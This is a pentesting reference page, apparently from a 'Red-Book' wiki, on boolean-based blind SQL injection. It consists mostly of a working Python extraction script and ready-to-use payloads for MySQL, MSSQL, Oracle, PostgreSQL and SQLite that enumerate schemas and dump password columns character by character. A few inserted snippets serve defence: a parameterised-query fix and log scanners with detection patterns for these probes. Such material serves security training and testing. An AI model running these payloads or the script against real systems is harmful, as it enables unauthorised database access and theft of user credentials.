Infiltr8: The Red-Book
Boolean Based

Theory

Boolean-based blind SQL injection relies on injecting a condition into the SQL query so that the application returns a different response depending on whether that condition evaluates to TRUE or FALSE. No data from the database is returned directly, but the response acts as an oracle: by asking one yes/no question per request (is the name this long? is the character at this position equal to X?), an attacker can reconstruct the data one character at a time. Depending on the boolean result (TRUE or FALSE), the content of the response either changes or remains the same.
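As an added illustration (not code from the Red-Book), the following Python snippet shows the mechanism behind that oracle against an in-memory SQLite database: a handler that concatenates user input into the query answers differently for a TRUE and a FALSE injected condition, while the same lookup with a bound parameter answers identically, which is the fix. The table, rows, probes and handler names are constructed for the example.

```python
import sqlite3


def build_db():
    """Constructed sample backend: a tiny in-memory database (invented data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [("1", "keyboard"), ("2", "mouse"), ("3", "monitor")])
    return conn


def lookup_vulnerable(conn, item_id):
    """Hypothetical vulnerable handler: the parameter is pasted into the SQL,
    so an injected AND condition decides whether any row comes back."""
    query = f"SELECT name FROM items WHERE id='{item_id}'"
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, item_id):
    """Hypothetical hardened handler: the same lookup with a bound parameter.
    The whole input is compared to the id column; none of it is parsed as SQL."""
    rows = conn.execute("SELECT name FROM items WHERE id=?", (item_id,))
    return [row[0] for row in rows]


# The two probes differ only in the compared value: the condition is TRUE in the
# first and FALSE in the second. The oracle is whether the response differs.
TRUE_PROBE = "1' AND (SELECT LENGTH('abc'))=3--"
FALSE_PROBE = "1' AND (SELECT LENGTH('abc'))=4--"


def response_differs(lookup, conn):
    """Return True when the handler's answer depends on the injected condition,
    i.e. when the endpoint can serve as a boolean oracle."""
    return lookup(conn, TRUE_PROBE) != lookup(conn, FALSE_PROBE)


if __name__ == "__main__":
    db = build_db()
    print("concatenating handler leaks a boolean:", response_differs(lookup_vulnerable, db))
    print("parameterised handler leaks a boolean:", response_differs(lookup_safe, db))
```

The parameterised handler returns an empty result for both probes because the bound value is compared as one opaque string, so the server response carries no information about the condition; that is why prepared statements close this class of injection rather than merely obscuring it.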

Practice

We can use a Python script similar to the one below to automate the process of dumping the database through blind SQLi.

Exploit Script Example
import requests
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry
import string


# Set the URL and other parameters
uri = "http://<TARGET>/search?id="
timeout = 5
retries = 3

# Create a session and attach the retry strategy to it
session = requests.Session()
retry_strategy = Retry(
    total=retries,
    backoff_factor=0.3,
    status_forcelist=[500, 502, 503, 504],
    connect=retries,
)
adapter = HTTPAdapter(max_retries=retry_strategy)
session.mount("http://", adapter)
session.mount("https://", adapter)

# Initialize variables
extracted = ""  # the string recovered so far (here: a table name)
table_id = 6    # index of the table to dump (used as the LIMIT offset)
i = 1           # position of the character currently being guessed

# Characters that would break the URL or the payload are not tried
skipped = ['*', '+', '.', '?', '|', '&', '$', '\\', '"', '\'', "#"]

while True:
    found = False
    for char in string.printable[:-6]:
        if char in skipped:
            continue

        # Edit payload for what you need, this example dumps table names on MySQL
        # For more payloads, check https://red.infiltr8.io/web-pentesting/web-vulnerabilities/server-side/sql-injection/blind-sqli/boolean-based
        payload = f"2'AND+(SELECT+HEX(SUBSTRING(table_name,{i},1))FROM+information_schema.tables+WHERE+table_schema=database()+LIMIT+{table_id},1)=HEX('{char}')--+-"

        for attempt in range(retries + 1):
            try:
                # If needed, replace here how the payload is sent
                r = session.get(url=uri + payload, timeout=timeout)
                r.raise_for_status()  # Raise an HTTPError for bad responses

                print(f"\r{extracted}                    {i}", end="")

                # The oracle: the error message is absent when the guess is right
                if "Trying to access array offset on value of type" not in r.text:
                    extracted = extracted + char
                    i += 1
                    found = True
                break  # Request succeeded, leave the retry loop
            except requests.exceptions.RequestException as e:
                print(f"Error making request: {e}")
                if attempt < retries:
                    print("Retrying...")
                    continue
                print("Request failed after retries.")
                break

        if found:
            break  # Start over with the full alphabet at the next position

    if not found:
        # No character matched at this position: the name is complete
        print(f"\nDone: {extracted}")
        break
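From the defender's side, an extraction loop like the one above leaves a distinctive trail: one client, one endpoint, dozens of requests whose query string differs only in a position index and a compared value. The following Python snippet (an added example, not part of the Red-Book) scans constructed access-log lines for those probe signatures and reports clients that exceed a threshold; the log lines, client addresses and the signature list are assumptions made for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (Common Log Format). The addresses, paths
# and timestamps are invented. 10.0.0.7 sends the kind of per-character probes a
# boolean-based extraction loop produces; 10.0.0.5 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /search?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search?id=2%27+AND+%28SELECT+LENGTH%28database%28%29%29%29%3D3--+- HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /search?id=2%27+AND+%28SELECT+HEX%28SUBSTRING%28database%28%29%2C1%2C1%29%29%29%3DHEX%28%27p%27%29--+- HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /search?id=2%27+AND+%28SELECT+ASCII%28SUBSTRING%28database%28%29%2C2%2C1%29%29%29%3D119--+- HTTP/1.1" 200 498
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /search?id=3 HTTP/1.1" 200 530
"""

# Minimal CLF parser: client address, request method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures of a boolean probe, matched on the decoded query string: a quote
# followed by a boolean operator, a per-character extraction function, and a
# trailing comment marker. Requiring two of the three keeps false positives down.
PROBE_PATTERNS = [
    re.compile(r"'\s*(AND|OR)\b", re.I),
    re.compile(r"\b(SUBSTRING|SUBSTR|ASCII|HEX|LENGTH|LEN)\s*\(", re.I),
    re.compile(r"(--|#)\s*$|--\s*-"),
]


def decoded_query(target):
    """Return the URL-decoded query string of a request target."""
    return unquote_plus(urlsplit(target).query)


def is_boolean_probe(target):
    """True when at least two probe signatures appear in the decoded query."""
    q = decoded_query(target)
    return sum(1 for p in PROBE_PATTERNS if p.search(q)) >= 2


def probes_per_client(log_text):
    """Count probe-looking requests per client address."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_boolean_probe(m["target"]):
            counts[m["ip"]] += 1
    return counts


def flag_clients(log_text, threshold=3):
    """Clients whose probe count reaches the threshold, sorted for stable output."""
    return sorted(ip for ip, n in probes_per_client(log_text).items() if n >= threshold)


if __name__ == "__main__":
    print(dict(probes_per_client(SAMPLE_LOG)))
    print("flagged:", flag_clients(SAMPLE_LOG))
```

In production the same logic runs over the WAF or web-server log stream with a per-client sliding window instead of a whole file; the decode step matters because the probes arrive URL-encoded, so matching on the raw request line would miss them.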

Getting database

MySQL

First, retrieve the database length:

1' AND (SELECT LENGTH(database()))=1-- -  #False  
1' AND (SELECT LENGTH(database()))=2-- -  #False
1' AND (SELECT LENGTH(database()))=3-- -  #True -> length of database is 3 characters.

Second, retrieve the database name:

--True -> It means the first character is p.
1' AND (SELECT HEX(SUBSTRING(database(), 1, 1)))=HEX('p')-- -
1' AND (SELECT ASCII(SUBSTRING(database(), 1, 1)))=112-- -  #ASCII code is in decimal

--True -> It means the second character is w.
1' AND (SELECT HEX(SUBSTRING(database(), 2, 1)))=HEX('w')-- -

--True -> It means the third character is n.
1' AND (SELECT HEX(SUBSTRING(database(), 3, 1)))=HEX('n')-- -

MSSQL

First, retrieve the database length:

1' AND (SELECT LEN(DB_NAME()))=1--  #False  
1' AND (SELECT LEN(DB_NAME()))=2--  #False
1' AND (SELECT LEN(DB_NAME()))=3--  #True -> It means the length of database is 3 characters.

Second, retrieve the database name:

--True -> It means the first character is p. Note that ASCII code is in decimal
1' AND (SELECT ASCII(SUBSTRING(DB_NAME(), 1, 1)))=112-- 

--True -> It means the second character is s.
1' AND (SELECT ASCII(SUBSTRING(DB_NAME(), 2, 1)))=115--

--True -> It means the third character is s.
1' AND (SELECT ASCII(SUBSTRING(DB_NAME(), 3, 1)))=115--

Oracle

First, retrieve the database length:

1' AND (SELECT LENGTH(global_name) FROM global_name)=1--  #False  
1' AND (SELECT LENGTH(global_name) FROM global_name)=2--  #False
1' AND (SELECT LENGTH(global_name) FROM global_name)=3--  #True -> It means the length of database is 3 characters.

Second, retrieve the database name:

--True -> It means the first character is p. Note that ASCII code is in decimal
1' AND (SELECT ASCII(SUBSTR(global_name, 1, 1)) FROM global_name)=112-- 

--True -> It means the second character is s.
1' AND (SELECT ASCII(SUBSTR(global_name, 2, 1)) FROM global_name)=115--

--True -> It means the third character is s.
1' AND (SELECT ASCII(SUBSTR(global_name, 3, 1)) FROM global_name)=115--

PostgreSQL

First, retrieve the database length:

1' AND (SELECT LENGTH(current_database()))=1--  #False  
1' AND (SELECT LENGTH(current_database()))=2--  #False
1' AND (SELECT LENGTH(current_database()))=3--  #True -> It means the length of database is 3 characters.

Second, retrieve the database name:

--True -> It means the first character is p. Note that ASCII code is in decimal
1' AND (SELECT ASCII(SUBSTRING(current_database(), 1, 1)))=112-- 

--True -> It means the second character is s.
1' AND (SELECT ASCII(SUBSTRING(current_database(), 2, 1)))=115--

--True -> It means the third character is s.
1' AND (SELECT ASCII(SUBSTRING(current_database(), 3, 1)))=115--

SQLite

The main database is called main, but several database files may be attached. First, retrieve the length of each database name like this:

1' AND (SELECT LENGTH(name) FROM pragma_database_list LIMIT 1 OFFSET 0)=1--  #False  
1' AND (SELECT LENGTH(name) FROM pragma_database_list LIMIT 1 OFFSET 0)=2--  #False
1' AND (SELECT LENGTH(name) FROM pragma_database_list LIMIT 1 OFFSET 0)=3--  #True -> length of the first database name is 3 characters.

1' AND (SELECT LENGTH(name) FROM pragma_database_list LIMIT 1 OFFSET 1)=3--  #True -> It means the length of the second database name is 3 characters.

Second, retrieve the database name:

--True -> It means the first character of second database's name is p.
1' AND (SELECT hex(substr(name,1,1)) FROM pragma_database_list LIMIT 1 OFFSET 1)=HEX('p')-- 

--True -> It means the second character is s.
1' AND (SELECT hex(substr(name,2,1)) FROM pragma_database_list LIMIT 1 OFFSET 1)=HEX('s')--

--True -> It means the third character is s.
1' AND (SELECT hex(substr(name,3,1)) FROM pragma_database_list LIMIT 1 OFFSET 1)=HEX('s')--

Getting Tables

MySQL

First, retrieve the number of tables:

1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=database())=2-- -  #True -> 2 tables

Second, retrieve the length of each table name

-- If True, the first table name length is 5
1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=5-- - 

-- If True, the second table name length is 5
1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)=5-- - 

Third, retrieve the name of each table

-- If True, the first char of the first table is u
1'AND (SELECT HEX(SUBSTRING(table_name, 1, 1))FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=HEX('u')-- -

-- If True, the second char of the first table is s
1'AND (SELECT HEX(SUBSTRING(table_name, 2, 1)) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)=HEX('s')-- -

-- If True, the first char of the second table is p
1'AND (SELECT HEX(SUBSTRING(table_name, 1, 1)) FROM information_schema.tables WHERE table_schema=database() LIMIT 1,1)=HEX('p')-- -

MSSQL

First, retrieve the number of tables:

1' AND (SELECT count(*) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME())=2--  #True -> 2 tables
1' AND (SELECT count(*) FROM information_schema.tables)=2-- #Run in actual context/DB

Second, retrieve the length of each table name

-- If True, the first table name length is 5
1' AND (SELECT TOP 1 LEN(table_name) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME())=5-- 

-- If True, the second table name length is 5
1' AND (SELECT TOP 1 LEN(table_name) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME() AND table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))=5--

-- If True, the third table name length is 5
1' AND (SELECT TOP 1 LEN(table_name) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME() AND table_name NOT IN(SELECT TOP 2 table_name FROM information_schema.tables))=5-- 

Third, retrieve the name of each table

-- If True, the first char of the first table is u
1'AND (SELECT TOP 1 ASCII(SUBSTRING(table_name, 1, 1)) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME())=117--

-- If True, the second char of the first table is s
1'AND (SELECT TOP 1 ASCII(SUBSTRING(table_name, 2, 1)) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME())=115--

-- If True, the first char of the second table is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(table_name, 1, 1)) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME() AND table_name NOT IN(SELECT TOP 1 table_name FROM information_schema.tables))=112--

-- If True, the first char of the third table is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(table_name, 1, 1)) FROM information_schema.tables WHERE TABLE_CATALOG=DB_NAME() AND table_name NOT IN(SELECT TOP 2 table_name FROM information_schema.tables))=112--

Oracle

First, retrieve the number of tables:

1' AND (SELECT COUNT(*) FROM all_tables WHERE owner = USER)=2-- #True -> 2 tables

Second, retrieve the length of each table name

-- If True, the first table name length is 5
1' AND (SELECT LENGTH(table_name) FROM all_tables WHERE owner = USER OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=5--

-- If True, the second table name length is 5
1' AND (SELECT LENGTH(table_name) FROM all_tables WHERE owner = USER OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY)=5-- 

Third, retrieve the name of each table

-- If True, the first char of the first table is u
1'AND (SELECT ASCII(SUBSTR(table_name, 1, 1)) FROM all_tables WHERE owner = USER OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=117--

-- If True, the second char of the first table is s
1'AND (SELECT ASCII(SUBSTR(table_name, 2, 1)) FROM all_tables WHERE owner = USER OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=115--

-- If True, the first char of the second table is p
1'AND (SELECT ASCII(SUBSTR(table_name, 1, 1)) FROM all_tables WHERE owner = USER OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY)=112--

PostgreSQL

First, retrieve the number of tables:

1' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=current_database())=2-- #True -> 2 tables

Second, retrieve the length of each table name (PostgreSQL uses LIMIT n OFFSET m, not the MySQL LIMIT m,n form)

-- If True, the first table name length is 5
1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=current_database() LIMIT 1 OFFSET 0)=5--

-- If True, the second table name length is 5
1' AND (SELECT LENGTH(table_name) FROM information_schema.tables WHERE table_schema=current_database() LIMIT 1 OFFSET 1)=5-- 

Third, retrieve the name of each table

-- If True, the first char of the first table is u
1'AND (SELECT ASCII(SUBSTRING(table_name, 1, 1)) FROM information_schema.tables WHERE table_schema=current_database() LIMIT 1 OFFSET 0)=117--

-- If True, the second char of the first table is s
1'AND (SELECT ASCII(SUBSTRING(table_name, 2, 1)) FROM information_schema.tables WHERE table_schema=current_database() LIMIT 1 OFFSET 0)=115--

-- If True, the first char of the second table is p
1'AND (SELECT ASCII(SUBSTRING(table_name, 1, 1)) FROM information_schema.tables WHERE table_schema=current_database() LIMIT 1 OFFSET 1)=112--

SQLite

First, retrieve the number of tables:

1' AND (SELECT COUNT(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%')=2-- #True -> 2 tables

Second, retrieve the length of each table name

-- If True, the first table name length is 5
1' AND (SELECT LENGTH(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' LIMIT 1 OFFSET 0)=5--

-- If True, the second table name length is 5
1' AND (SELECT LENGTH(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' LIMIT 1 OFFSET 1)=5-- 

Third, retrieve the name of each table

-- If True, the first char of the first table is u
1'AND (SELECT HEX(SUBSTR(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' LIMIT 1 OFFSET 0)=HEX('u')--

-- If True, the second char of the first table is s
1'AND (SELECT HEX(SUBSTR(tbl_name,2,1)) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' LIMIT 1 OFFSET 0)=HEX('s')--

-- If True, the first char of the second table is p
1'AND (SELECT HEX(SUBSTR(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' LIMIT 1 OFFSET 1)=HEX('p')--

Getting Columns

MySQL

First, retrieve the number of columns:

1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE')=2-- -  #True -> 2 columns

Second, retrieve the length of each column name

-- If True, the first column's name length is 3
1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE' LIMIT 0,1)=3-- - 

-- If True, the second column's name length is 8
1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE' LIMIT 1,1)=8-- - 

Third, retrieve the name of each column

-- If True, the first char of the first column is a
1'AND (SELECT HEX(SUBSTRING(column_name, 1, 1))FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE' LIMIT 0,1)=HEX('a')-- -

-- If True, the second char of the first column is b
1'AND (SELECT HEX(SUBSTRING(column_name, 2, 1))FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE' LIMIT 0,1)=HEX('b')-- -

-- If True, the first char of the second column is p
1'AND (SELECT HEX(SUBSTRING(column_name, 1, 1))FROM information_schema.columns WHERE table_schema=database() AND table_name='TABLE_NAME_HERE' LIMIT 1,1)=HEX('p')-- -

MSSQL

First, retrieve the number of columns:

1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE')=2--  #True -> 2 columns

Second, retrieve the length of each column name

-- If True, the first column name length is 5
1' AND (SELECT TOP 1 LEN(column_name) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE')=5-- 

-- If True, the second column name length is 5
1' AND (SELECT TOP 1 LEN(column_name) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE' AND column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))=5--

-- If True, the third column name length is 5
1' AND (SELECT TOP 1 LEN(column_name) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE' AND column_name NOT IN(SELECT TOP 2 column_name FROM information_schema.columns))=5-- 

Third, retrieve the name of each column

-- If True, the first char of the first column is a
1'AND (SELECT TOP 1 ASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE')=97--

-- If True, the second char of the first column is b
1'AND (SELECT TOP 1 ASCII(SUBSTRING(column_name, 2, 1)) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE')=98--

-- If True, the first char of the second column is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE' AND column_name NOT IN(SELECT TOP 1 column_name FROM information_schema.columns))=112--

-- If True, the first char of the third column is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE TABLE_CATALOG=DB_NAME() AND table_name='TABLE_NAME_HERE' AND column_name NOT IN(SELECT TOP 2 column_name FROM information_schema.columns))=112--

Oracle

First, retrieve the number of columns:

1' AND (SELECT COUNT(column_name) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE')=2--  #True -> 2 columns

Second, retrieve the length of each column name

-- If True, the first column's name length is 3
1' AND (SELECT LENGTH(column_name) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE' OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=3-- 

-- If True, the second column's name length is 8
1' AND (SELECT LENGTH(column_name) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE' OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY)=8-- 

Third, retrieve the name of each column

-- If True, the first char of the first column is a
1'AND (SELECT ASCII(SUBSTR(column_name, 1, 1)) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE' OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=97--

-- If True, the second char of the first column is b
1'AND (SELECT ASCII(SUBSTR(column_name, 2, 1)) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE' OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=98--

-- If True, the first char of the second column is p
1'AND (SELECT ASCII(SUBSTR(column_name, 1, 1)) FROM all_tab_columns WHERE owner = USER AND table_name='TABLE_NAME_HERE' OFFSET 1 ROWS FETCH NEXT 1 ROWS ONLY)=112--

First, retrieve the number of columns:

1' AND (SELECT COUNT(column_name) FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE')=2--  #True -> 2 columns

Second, retrieve length of each column

-- If True, the first column's name length is 3
1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE' LIMIT 1 OFFSET 0)=3--

-- If True, the second column's name length is 8
1' AND (SELECT LENGTH(column_name) FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE' LIMIT 1 OFFSET 1)=8--

Third, retrieve name of each column

-- If True, the first char of the first column is a
1'AND (SELECT ASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE' LIMIT 1 OFFSET 0)=97--

-- If True, the second char of the first column is b
1'AND (SELECT ASCII(SUBSTRING(column_name, 2, 1)) FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE' LIMIT 1 OFFSET 0)=98--

-- If True, the first char of the second column is p
1'AND (SELECT ASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE table_schema=current_database() AND table_name='TABLE_NAME_HERE' LIMIT 1 OFFSET 1)=112--

We can send the following queries to retrieve the sql field of sqlite_master character by character:

-- If True, the first char of sql field is C
1' AND (SELECT HEX(SUBSTR(sql,1,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('C')--

-- If True, the second char of sql field is R
1' AND (SELECT HEX(SUBSTR(sql,2,1)) FROM sqlite_master WHERE type!='meta' and sql NOT NULL AND name='TABLE_NAME_HERE')=HEX('R')--

Dump values

First, retrieve the length of the value (we take password column as example):

1' AND (SELECT LENGTH(password) FROM users LIMIT 0,1)=9-- -  #True -> 1st password is 9 char

Second, retrieve values

-- If True, the first password's char is p
1'AND (SELECT HEX(SUBSTRING(password, 1, 1))FROM users LIMIT 0,1)=HEX('p')-- -

-- If True, the second password's char is a
1'AND (SELECT HEX(SUBSTRING(password, 2, 1))FROM users LIMIT 0,1)=HEX('a')-- -

First, retrieve the length of the value (we take password column as example):

-- True -> 1st password is 9 char
1' AND (SELECT TOP 1 LEN(password) FROM users)=9--

-- True -> 2nd password is 9 char
1' AND (SELECT TOP 1 LEN(password) FROM users WHERE password NOT IN(SELECT TOP 1 password FROM users))=9--

Second, retrieve values

-- If True, the first password's char is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(password, 1, 1))FROM users)=112--

-- If True, the second password's char is a
1'AND (SELECT TOP 1 ASCII(SUBSTRING(password, 2, 1))FROM users)=97--

-- If True, the first char of second password is p
1'AND (SELECT TOP 1 ASCII(SUBSTRING(password, 1, 1)) FROM users WHERE password NOT IN(SELECT TOP 1 password FROM users))=112--

-- If True, the second char of second password is a
1'AND (SELECT TOP 1 ASCII(SUBSTRING(password, 2, 1)) FROM users WHERE password NOT IN(SELECT TOP 1 password FROM users))=97--

First, retrieve the length of the value (we take password column as example):

1' AND (SELECT LENGTH(password) FROM users OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=9--  #True -> 1st password is 9 char

Second, retrieve values

-- If True, the first password's char is p
1'AND (SELECT ASCII(SUBSTR(password, 1, 1)) FROM users OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=112--

-- If True, the second password's char is a
1'AND (SELECT ASCII(SUBSTR(password, 2, 1)) FROM users OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY)=97--

First, retrieve the length of the value (we take password column as example):

1' AND (SELECT LENGTH(password) FROM users LIMIT 1 OFFSET 0)=9--  #True -> 1st password is 9 char

Second, retrieve values

-- If True, the first password's char is p
1'AND (SELECT ASCII(SUBSTRING(password, 1, 1)) FROM users LIMIT 1 OFFSET 0)=112--

-- If True, the second password's char is a
1'AND (SELECT ASCII(SUBSTRING(password, 2, 1)) FROM users LIMIT 1 OFFSET 0)=97--

First, retrieve the length of the value (we take password column as example):

1' AND (SELECT LENGTH(password) FROM users LIMIT 1 OFFSET 0)=9--  #True -> 1st password is 9 char

Second, retrieve values

-- If True, the first char of first password is p
1'AND (SELECT HEX(SUBSTR(password, 1, 1)) FROM users LIMIT 1 OFFSET 0)=HEX('p')--

-- If True, the second char of first password is a
1'AND (SELECT HEX(SUBSTR(password, 2, 1)) FROM users LIMIT 1 OFFSET 0)=HEX('a')--
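From the defender's side, as an added example that is not part of the original page: every payload family above is built from the same few blocks (a per-character ASCII/HEX(SUBSTR()) probe, a LENGTH/LEN oracle, a catalogue table, a trailing comment), and because boolean-based extraction costs one request per character, the useful signal is a burst of such probes from one client rather than any single request. The scanner below looks for exactly those blocks in web-server access log lines; the log lines, IP addresses and thresholds are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed "combined"-style access log lines (hypothetical hosts and IPs).
SAMPLE_LOG = """
203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "GET /item?id=1'%20AND%20(SELECT%20LENGTH(password)%20FROM%20users%20LIMIT%201%20OFFSET%200)=9-- HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2024:13:55:37 +0000] "GET /item?id=1'AND%20(SELECT%20ASCII(SUBSTRING(password,%201,%201))FROM%20users%20LIMIT%201%20OFFSET%200)=112-- HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2024:13:55:38 +0000] "GET /item?id=1'AND%20(SELECT%20HEX(SUBSTR(sql,1,1))%20FROM%20sqlite_master%20WHERE%20name='users')=HEX('C')-- HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2024:13:55:39 +0000] "GET /item?id=1'AND%20(SELECT%20ASCII(SUBSTRING(password,%202,%201))FROM%20users%20LIMIT%201%20OFFSET%200)=97-- HTTP/1.1" 200 512
198.51.100.20 - - [10/Oct/2024:13:56:01 +0000] "GET /item?id=42 HTTP/1.1" 200 512
198.51.100.20 - - [10/Oct/2024:13:56:05 +0000] "GET /search?q=ascii+art+length HTTP/1.1" 200 512
""".strip().splitlines()

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')

# One regex per building block shared by the MySQL/MSSQL/Oracle/PostgreSQL/SQLite payloads.
INDICATORS = {
    "char_probe": re.compile(r"\b(?:ASCII|HEX)\s*\(\s*SUBSTR(?:ING)?\s*\(", re.I),  # per-character extraction
    "length_probe": re.compile(r"\bLEN(?:GTH)?\s*\(", re.I),                       # value-length oracle
    "catalogue": re.compile(r"information_schema\.columns|all_tab_columns|sqlite_master", re.I),
    "comment_tail": re.compile(r"--\s*-?\s*$"),                                    # "--" or "-- -" tail
}

def classify_request(url):
    """Return the set of indicator names found in the URL-decoded query string."""
    query = url.split("?", 1)[1] if "?" in url else ""
    decoded = unquote_plus(query)
    return {name for name, pattern in INDICATORS.items() if pattern.search(decoded)}

def scan_log(lines, min_probes=3):
    """Count char/length probes per client IP and report clients at or above min_probes."""
    probes = Counter()
    seen = {}
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not an access-log line we understand
        found = classify_request(match["url"])
        if found & {"char_probe", "length_probe"}:
            probes[match["ip"]] += 1
            seen.setdefault(match["ip"], set()).update(found)
    return {ip: {"probes": n, "indicators": sorted(seen[ip])}
            for ip, n in probes.items() if n >= min_probes}

if __name__ == "__main__":
    for ip, report in scan_log(SAMPLE_LOG).items():
        print(f"{ip}: {report['probes']} probes, indicators={report['indicators']}")
```

Tuning `min_probes` and the time window to the application's normal traffic is what keeps this from firing on a single odd-looking search term.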

Enumeration of columns is a bit different in SQLite. We have to enumerate the sqlite_schema.sql field (the same table is also reachable as sqlite_master), which stores the SQL text that describes the object. This SQL text is a CREATE TABLE, CREATE VIRTUAL TABLE, CREATE INDEX, CREATE VIEW, or CREATE TRIGGER statement that, if evaluated against the database file when it is the main database of a database connection, would recreate the object.

Resources

What is SQL Injection? Tutorial & Examples | Web Security Academy (WebSecAcademy)
Blind SQL Injection (Defend the Web)